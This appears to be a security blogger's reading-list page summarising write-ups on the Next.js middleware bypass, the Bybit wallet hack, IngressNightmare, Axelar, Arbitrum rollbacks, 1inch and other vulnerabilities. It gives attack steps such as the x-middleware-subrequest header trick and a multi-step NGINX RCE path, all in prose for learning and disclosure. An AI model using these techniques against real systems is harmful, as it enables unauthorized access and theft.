Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Next.js and the corrupt middleware: the authorizing artifact- 1626

zhero___    Reference →Posted 11 Months Ago
  • NextJS is a super popular React framework with a ton of extra functionality. In fact, this website is built on top of it. The author of this post was reviewing NextJS and found a way to circumvent the middleware, which is commonly used for authentication.
  • Within the framework, there is a check for recursive requests. For instance, if the middleware itself is making a request to the server. This is done by setting the x-middleware-request header with the path of the middleware being executed. For every piece of middleware it sees, a colon-delimited path is added. If the middleware has already been seen, then the code simply skips the middleware.
  • As it turns out, it's possible to specify this header yourself! So, if you know the path of the middleware you want to skip then adding x-middleware-subrequest: my_path skips the check. If this is used for authentication/authorization, then it's a horrible vulnerability. The path is somewhat guessable and the header can be used as a polyglot as well.
  • Initially, they found this in an old version of the package. Since that code had been removed, they assumed only older versions were affected. In reality, the code had been moved somewhere else. It's best to report vulnerabilities, even if they only affect older versions. You never know what you're missing about impact as a bug hunter.
  • Instead of needing to specify the path, it's super simple: middleware or src/middleware. With the changing of the path, it actually makes it easier. Additionally, there is a now a recursive check with a maximum of 5. So, middleware: just needs to be repeated 5 times now.
  • They used this exploit on a few bug bounty programs. One program was using the middleware as a rewrite rule. They knew this because of a header in the response. By using this vulnerability, they were able to visit the admin page. On another program, they used this as a cache poisoning DoS via forcing a 404 response by skipping the rewrite rules.
  • Overall, an excellent write up on the discovery and exploitation of a NextJS vulnerability. I learned a ton about the framework, exploitation, and proper disclosure from this. Great work!

In-Depth Technical Analysis of the Bybit Hack- 1625

Mario Rvias - NCC Group    Reference →Posted 11 Months Ago
  • Bybit had a 1.4 billion theft of crypto assets - 401K ETH - drained from a cold wallet. They use Safe{Wallet} with a 3 out X MultiSig. If all of these people reviewed what they were signing, then what happened?
  • Attackers compromised the Safe{Wallet} UI. So when the Bybit folks were signing off on the transaction and reviewing the details, they were signing off on the wrong thing! The attack was specifically targeting Bybit, looking at the JavaScript.
  • Instead of doing a transfer of any funds, delegateCall was made to a contract controlled by the attacker. At this point, they were able to modify the Safe contract storage to change the proxy slot. By doing this, future calls the attacker made to the contract would go through their proxy to execute a delegateCall, allowing for complete ownership of the assets at the address. Stealing funds is trivial at this point.
  • What would have the executors seen? On the web page, they saw the original transaction. What about the wallet? They would have seen raw bytes with no real meaning in them. Brutal... Overall, a good look into the exploit.

Total NEAR Shutdown- 1624

Neumo    Reference →Posted 11 Months Ago
  • NEAR is a blockchain with a unique runtime and architecture from EVM chains. The network is broken into shards of validators to support lots of transactions on the network. This uniqueness is what drew the authors to this program.
  • Upon initial analysis of the codebase, the receipt processing looked sketchy. The error handling appeared extremely complex yet solid at first glance. Eventually, they noticed a new change: max_receipt_size. To me, this is interesting - small changes can create subtle new invariants that were not there before.
  • The validation of the receipt size was done in multiple locations. Notably, this only happened on the in take. In some scenarios, the receipt size could be increased during execution. In particular, if a receipt points to another receipt and the data from this other receipt is added to the original receipt, the actual size increases without validation. Having a receipt barely below the size limit and having it expanded causes some havoc.
  • When being processed again as an incoming_receipt by other nodes, the exceeded size limit leads to a panic being hit. From their report, they were hunting for possible panics in the codebase and how to hit them. Aka, sink-to-source bug hunting.
  • The impact is that all nodes receiving the receipt immediately crash. Some nodes would likely bounce back via watchdog programs but would then crash again. Once this receipt is dropped, the contract could be called again to trigger this crash over and over again though.
  • The solution is somewhat interesting: the function validate_receipt actually removes the validation of the receipt size. In particular, they ONLY want to check for size constraints during creation and not expansion. I would have expected a check to be added on the expansion code to not exceed the limit, so this patch surprised me.
  • The auditors were not thrilled with their payout. It was rated as a high severity issue, which has a range of 20K-200K. A similar vulnerability was paid out 150K. They were paid out less than half, so likely something between 80K-100K for the vulnerability, which is still great money. The authors claimed that they never talked directly with NEAR themselves - they only talked with HackenProof who talked to NEAR for them.
  • From my perspective, programs are going to pay out what they want to pay out. When the previous vulnerability was reported, maybe NEAR was doing better financially; there's more to deciding a payout than just the impact of the vulnerability, especially when funds are not directly at risk. Immunefi does have a different business model that does seem to push for higher payouts though. I appreciate the insight into the HackenProof experience though.
  • Overall, a fun bug! Sink to source bug hunting works well and the addition of the max size of the receipt introduced a funny invariant. Searching for No's and ways to trigger them is a great way to find DoS bugs.

Pwning Millions of Smart Weighing Machines with API and Hardware Hacking- 1623

Space Raccoon    Reference →Posted 11 Months Ago
  • While at a gym, the author noticed a WiFi symbol on a scale. Upon doing further research, they realized that all of the products on Amazon were made by the same OEM with marginally different codebases. The mobile apps were even the same. So, the author decided to try to remotely hack these devices.
  • Before even buying a device, they reverse engineered the mobile app to find APIs. To their horror, the firmware update APIs suffered from simple SQL injections. This let them enumerate devices and their authentication secrets, without having the physical box for it. They required some fun SQLi WAF bypasses to make this work.
  • From there, they decided to get a shell on the device for further testing. This was done via connecting via UART on one of the scales. This was useful for debugging the linking flow of the scale. In particular, they wanted to know how the API servers communicated with the scale itself and through the phone app of the user.
  • The scale would receive credentials for the WiFi via Bluetooth. The device uses mTLS to get a session token for authentication. The user-device association could be done in two ways: one initiated by the user and another by the scale. All of these properly checks the deviceid against the session token and other fields, making this pretty solid.
  • While messing around with the parameters, they were intrigued by the multiple ways to do auth. Eventually, they tried mixing-and-matching the two flows for tying the user and device together. By providing a user session token but using a deviceid in the headers that we don't own, the request authenticates us but believes it's a device initiated request because of the header. So, it assumes that the device is valid but it's really not. The explanation and the code snippet they provide helps a lot with this.
  • Several good bugs! From a blackbox perspective, multiple authentication schemes coming together is tricky to get right. The SQL injection bug was trivial but they had to put other work in order to find these APIs. You always need to put in the work but it's just in different areas sometimes, such as reverse engineering.

Henlo Kart post mortem- 1622

henlokart    Reference →Posted 11 Months Ago
  • The team behind the Henlo Kart product was working on publishing two public packages to NPM. They were worried about sensitive files, such as .env, containing deployment credentials, being leaked. This was done via the .gitignore file. For the initial deployment of two packages, this worked well.
  • Later, an update to one of the packages was made - they wanted to exclude additional files from NPM. So, they created an .npmignore file to do this. Surprisingly, the presence of this file invalidated the .gitignore! This meant that the sensitive .env file was leaked. This contained a private key for the deployer account.
  • After a few hours, they noticed the error. They attempted to revoke the package version, but this was not allowed because other packages they created depended on it. By the time they contacted NPM to remove the package, the damage was done - the key had been exposed. An attacker found it.
  • The attacker took about 60ETH that was sitting in AAave. Additionally, they took control of the core Henlo contract, giving them the ability to mint new tokens. The team was able to recover some of the funds but the damage had been done. So, they rebranded the product and launched a new token from the previous snapshots.
  • The attackers are real! This is a sad reminder of that. Good explanation of the attack and the failures though.

CVE-2024-55963: Unauthenticated RCE in Default-Install of Appsmith- 1621

Whit Taylor - Rhino Security    Reference →Posted 11 Months Ago
  • Appsmith is an open-source developer tool designed to help organizations build internal applications, such as dashboards, admin panels, and customer support tools. It has three roles - admin, developer and app viewer.
  • Appsmith has datasources that allows applications to use information from various databases and other endpoints - many of these run locally. One of these, configured by default, is a PostgreSQL database. The configuration of this server allows for the logging into the database as any user without providing a password. This is done via a server-side connection.
  • The interaction with PostgreSQL requires a valid account. Although the app requires an invitation for current workspaces, its default configuration allows for user signup! A user can then configure their own workspaces and application to expose the vulnerable functionality.
  • The application, that the user is able to create, allows for login as the superuser of Postgres via the web console. Using this, it's possible to call cat /etc/passwd on a SQL query. Since this is the super user, it's effectively game over.
  • There are two other bugs but this one was by far the most interesting. Good find!

IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX- 1620

Wiz.io    Reference →Posted 11 Months Ago
  • The Ingress NGINX Controller on Kubernetes is a popular ingress controller for managing incoming network traffic and routing it to the proper Pod. This is built on top of the popular NGINX reverse proxy software. The author claims that 41% of internet facing clusters use this software. Since it's internet facing, an authentication bypass or an RCE bug would be catastrophic for these services.
  • The service attempts to translate Kubernetes Ingress objects into NGINX configurations. The Admission Controller is a Kubernetes API server for reviewing, modifying and blocking requests. These controllers don't require authentication.
  • In the Admission Controller code, the AdmissionReview request generates a temporary NGINX configuration file using a template. Then, to test for validity, it runs nginx -t. Since the configuration file has user controlled inputs, the path is unauthenticated and the config is executed, this makes it a great attack surface.
  • The authreq parameter is used for authentication-related annotations. However, this field has zero input sanitization. Hence, it's possible to add arbitrary directives to the NGINX configuration file. There are several other variants of this on the authtls and mirror parameters. So, why is this injection a big deal?
  • The NGINX configuration format has a lot of directives, many of which are undocumented. the ssl_engine directive is able to load shared modules, without top-of-file restrictions like load_module. Doing this would allow for the execution of arbitrary code but requires a file to be on the system.
  • The pod runs an NGINX instance itself. When processing NGINX, the request body is saved to a temporary file if its large enough. Although NGINX removes the file immediately, there is an open file descriptor in the /proc file system. Using this, it's possible to access the contents of the file from the NGINX configuration. To make this race condition easier, making the Content-Length larger than the body will keep NGINX waiting. Sadly, this requires brute forcing PIDs and file descriptors, but that's worth the problem.
  • Here's the full path to RCE:
    1. Upload the .so payload by abusing the file buffer feature.
    2. Send an AdmissionReview request to the controller with directive injections. In particular, inject the ssl_engine to load the shared library from step 1.
    3. Try different PID paths over and over again. Eventually, it will execute and you'll get RCE.
  • Overall, a great write up or a relatively unknown attack surface. This covers the fact that running nginx -t can lead to code execution, making configuration injection a very serious vulnerability.

Halting Cross-chain: Axelar Network Vulnerability Disclosure- 1619

Macro Nunes    Reference →Posted 1 Year Ago
  • Axelar is a cross-chain bridging protocol. To come to an agreement on whether a cross-chain vote has happened or not, 60% of the stake on Axelar has to approve it. The voting is performed on the Axelar blockchain, which is a Cosmos SDK chain. To off-chain listener is called vald.
  • There are uptime requirements for all of the voters, called chain maintainers, of a particular chain. Validators who miss votes will be deregistered and lose rewards.
  • Once the ContractCall on an Axelar gateway contract is made, the vald program will see this and vote on the Cosmos Axelar chain. To do this, they call ConfirmGatewayTxs.
  • While reviewing the configuration settings of the Axelar chain validators, they noticed the max_body_bytes setting. This is the maximum amount of bytes that can be in a request - 1MB. If this limit is exceeded, then the Axelar node will drop the request. These settings are seldomly changed and is the default value in the official setup instructions. By forcing the ConfirmGatewayTxs to be larger than 1MB, with excessive amounts of logs, the voting transactions from vald would be rejected!
  • By itself, this isn't a huge deal. However, considering the voting penalties is where this becomes interesting. Remember, if a certain amount of votes are missed, then the chain maintainers are deregistered. The voting has no minimum quorum check. If there's a poll to vote on, even if nobody can vote or does vote, the chain maintainers will get slashed for this.
  • The author of the cost does some cost analysis. To take down all major chains, it would cost 5K. In the future, it would cost another $11 per chain to do this again. Here's the flow of the attack:
    1. Create 2 malicious transactions that make 2000 ContractCall logs on the Axelar Gateway.
    2. Call ConfirmGatewayTxs on Axelar with the txids from the events listed. At this point, vald detects the polls and tries to vote but fails because of the size of the HTTP request.
    3. Do step 2 over and over again until the chain maintainers are deregistered.
  • The impact of this is pretty severe - it stops Axelar in its tracks on all chains. Initially, Axelar rated this as medium and asked to pay 5K with this being considered a "liveness vs. security" issue, increasing this to 20K but this was still rejected. After multiple follow ups from Immunefi, this was upgraded to a critical at 50K. You gotta love Immunefi and their help towards hackers!
  • This vulnerability is a great win for public disclosure. The bug had not been fixed when this was published. However, within a few days of publishing the post, the issue was fixed by disabling auto-deregistration altogether. Without the public disclosure, this vulnerability may not have been fixed.
  • To me, the real vulnerability was the missing minimum vote check before slashing. It's weird that Axelar fixed this by removing the deregistration. I personally love this post of taking a "small thing" to abuse a fundamental design issue.

DoubleUp Roll: Double-spending in Arbitrum by Rolling It Back- 1618

Hong Kong Polytechnic    Reference →Posted 1 Year Ago
  • Arbitrum and Optimism are Optimistic Rollups. This means that they are an L2 blockchain that inherits the security of the L1 by posting all of the L2 data to the L1. There are several rolls with these blockchains:
    • Sequencer: Creates the blocks from the submitted transactions to its private mempool.
    • Batcher: Posts the transaction information to the Ethereum L1. This allows to deriving of the state of the L2 from only Ethereum, making it a rollup instead of a sidechain.
    • Publisher: Posts the L2 consensus state to Ethereum. There is also a Challenger that can submit fraud proofs is something is done wrong by the Publisher.
  • The transaction lifecycle of an L2 is as follows:
    1. User submits transaction to RPC on L2 or to specific contract on L1.
    2. Sequencer creates a block and broadcasts it to the L2. The block is soft finalized.
    3. The block information is posted to Ethereum via the Batcher role for the Data Availability part of a rollup.
    4. The posted batch is seen by the L2 nodes. This makes the block hard-finalized.
    5. If the batch is different than the current state of the L2 then a rollback is done on the soft-finalized transactions.
  • There are three scenarios where rollbacks can occur that are relevant:
    • If the block time gap is too different on the L1 compared to the L2, then the block will be rolled back. This is a security mechanism to prevent too much manipulation of the block.timestamp in Solidity.
    • In case of the Sequencer going down, transactions can be forced through the L1, after a 24 hour delay. If the transaction was never included in the L1 but was in an L2 block then this forced inclusion will trigger a rollback.
    • Invalid posted batch information to the L2 not being processed on the L1. This leads to a rollback on the L2.
  • The goal of this paper is to force trigger rollbacks to have a double spend via deposits/withdrawls or after a large amount of blocks have passed to break bridges. Using the rollback mechanisms above, this is what they do. Of course, this requires some Tomfoolery to get transactions delayed properly.
  • In the Overtime attack, the goal is to change the time on a deposit that has already been used. It works as follows:
    1. Cause a major delay in the batch processing. This is no "one" way to do this.
    2. Submit deposit to the L2.
    3. L2 accepts the deposit.
    4. Batcher is unable to submit the the deposit to the L1 because of batching delays done in step 1.
    5. Attacker initiates and gets a withdrawal accepted for their recent deposit.
    6. Time-bound mechanism springs into action! The L2 block has its block rolled back.
    7. L1 deposit is processed in the new L2 block. Now, we have two sets of funds from the same deposit. Personally, I'm confused on how the withdrawal gets processed before the redoing of the finalization on the L1.
  • In the QueueCut Attack, the liveness preservation is abused.
    1. Introduce a delay in the L2 to L1 comms by adding a bunch of transactions with incompressable data.
    2. Trigger deposit from the L1. This will soft finalization immediately.
    3. Trigger a withdrawal on the L2 with that deposit. This will be processed quickly.
    4. Because of the delay and queue, the force inclusion feature can now be used. Use this to trigger a deposit.
    5. Force inclusion negates the L2 block that had the original deposit. Hence, we have a double spend.
  • The ZipBomb attack is making data uncompressable from the perspective of the Sequencer. This leads to the L1 refuses to process the L2 block, leading to a rollback. To me, the asynchronous processing is weird. I thought that the blocks would build on each other and require a perfect order. In reality, this isn't the case, which allows for the weird ordering of things. I imagine that many of these ideas came from noticing a bad state machine vs. the rollback mechanics being able to be DoSed.
  • The fixes to these bugs are not just a couple lines of code - they are design-level fixes because of the asynchronous processing. Both Optimism and Arbitrum having a streaming mechanism to ensure that blocks can always be handled. To mitigate the Zip Bomb attack, Arbitrum now only cares about the plaintext size on submission and not the compressed size.
  • On Optimism, they added a fee prioritization structure instead of a first-come-first-server queue. Additionally, instead of the more complicated one-block-per-transaction strategy, they now use a 2-second fixed interval. As far as cross-chain bridges go, there are still some concerns. They urged products to wait until L1 inclusion instead of L2 block confirmations.

Yul Calldata Corruption — 1inch Postmortem- 1617

Omar Ganiev    Reference →Posted 1 Year Ago
  • 1Inch is a limit order swap DeFi platform. 1Inch Fusion is a gasless swap protocol built on top of the core Limit Order Protocol. This version was deprecated in 2023 but was kept alive for backwards compatibility reasons. The original implementation had over 9 audits.
  • Recently, the V1 protocol was hacked. Looking at the exploit transactions, it starts off looking very normal. Then, came a red flag: both the taker and the maker on the swap were the same. Additionally, the attacker had made over 1M USDC on the trade.
  • Upon trying to make the Settlement of the limit order, a call to resolveOrders is made to a contract. This code appeared to be very similar to the example integration and looked pretty safe. Upon closer inspection, the victim contract had not updated the protocol even when the interfaces had changed.
  • The vulnerability appears to be around lack of validation on resolver. This is a NOT intended to be a controlled element of settleOrder. In fact, it's passed in with new bytes(0) since only the contract itself should be able to set it. How was this controlled? What gives? The woes of multiple versions!
  • Much of this code is written in Yul, the Assembly of Solidity. In the Yul, there is a ptr. When writing a value called the suffix, it's written at an offset depending on the passed in interactionLength. interactionLength is a full 32 byte word, which can overflow when doing ptr + interactionOffset + interactionLength. Because of this overflow, the pointer can be decreased to write the user controlled suffix to any location! Sounds like memory corruption!
  • Here's the full flow of the attack:
    1. Create a swap order that swaps a few wei for millions. Normally, this would obviously be rejected.
    2. Specify an invalid interactionLength value to overflow to point to the resolver address.
    3. Add a fake suffix structure to overwrite the resolver address.
  • The authors of this post did the internal investigation but also did several of the audits on the protocol. So, what happened? Initially, the resolver contract code wasn't in scope for audits, so it was ignored. In March of 2023, these auditors actually found the integer overflow while assessing the scope. However, shortly after, the code was completely rewritten so they didn't feel it was necessary to callout.
  • Here's the interesting twist: this previous version of the contract had already been deployed and the auditors didn't know it. Additionally, they were unsure about the impact of the vulnerability, so they moved on from it.
  • How can we prevent this type of thing from happening in the future?
    1. Clearly defined what code is being used. It's acceptable to have multiple versions but both need to be audited.
    2. Informational findings are helpful. There may be more impact of something than an auditor initially realizes.
  • Overall, a super cool postmortem on the exploitation of this vulnerability. The vulnerability is unique and I love the analysis on how this slipped through the cracks.